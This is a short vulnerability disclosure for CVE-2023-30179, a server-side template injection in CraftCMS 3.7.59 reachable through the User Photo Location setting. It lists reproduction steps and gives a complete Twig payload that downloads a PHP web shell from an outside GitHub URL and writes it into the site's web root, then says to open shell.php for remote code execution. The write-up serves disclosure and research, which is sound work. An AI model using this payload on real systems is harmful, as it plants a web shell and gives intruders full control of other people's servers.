[CVE-2023-30179] Server-Side Template Injection

Exploit Author: datnlq aka a member from Information Security Lab at VNUHCM-University of Information Technology

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-30179

Description: CraftCMS 3.7.59 is vulnerable Server-Side Template Injection (SSTI). An authenticated attacker can inject Twig Template to User Photo Location. Upload new avatar, lead to Remote Code Execution.

Steps to reproduce:

Step 1: Go to User Settings -> Settings -> Inject SSTI Payload to User Photo Location field
Step 2: Upload new Avatar (My Account -> Photo)
Step 3: Go to Assets to view result of SSTI Payload

Exploit SSTI to RCE:

In the admin page, the User Settings -> Settings function we can inject into the User Photo Location param using Twig template to Title Format.

Payload:

SSTI_UserPhotoLocation_RCE{% set source=['https://raw.githubusercontent.com/datnlq/CraftCMS/main/shell.php']|map('file_get_contents')|join %} {{{(source):"/var/www/html/craft_cms/web/shell.php"}|map("file_put_contents")|join()}}

After that, we upload new avatar to trigger SSTI template. Access shell.php to RCE.

Previous[CVE-2023-30178] Server-Side Template Injection Next[CVE-2023-33614] Reflected - Cross Site Script (XSS)

Last updated 2 years ago